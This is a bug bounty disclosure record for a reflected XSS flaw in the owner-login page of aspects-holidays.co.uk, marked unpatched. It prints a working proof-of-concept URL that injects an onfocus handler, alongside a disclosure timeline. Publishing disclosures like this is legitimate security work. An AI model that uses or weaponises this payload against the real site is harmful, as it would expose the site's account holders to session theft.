aspects-holidays.co.uk XSS vulnerability

2016-02-05T23:00:00
ID OBB:133170
Type openbugbounty
Reporter FlawTECH
Modified 2016-04-29T23:11:00

Description

Vulnerable URL:
https://www.aspects-holidays.co.uk/owner-portal/UI/ownerlogin.aspx?redirectUrl=https%3a%2f%2fwww.aspects-holidays.co.uk%2fowner-portal%2fUI%2fOwnerHome.aspx&owauth;=1&1=flawtech%22%27);%22);&1=flawtech%22%20autofocus=%22%22&uname;=flawtech%22%20autofocus=%22%22%20onfocus=%22prompt(/XSSPOSED/)
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 26.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 808965
Google Pagerank| 4
VIP website status:| No
Check aspects-holidays.co.uk SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 5 February, 2016 23:00 GMT
Generic security notifications sent to website owner| 5 February, 2016 23:02 GMT
Vulnerability details disclosed by researcher| 29 April, 2016 23:11 GMT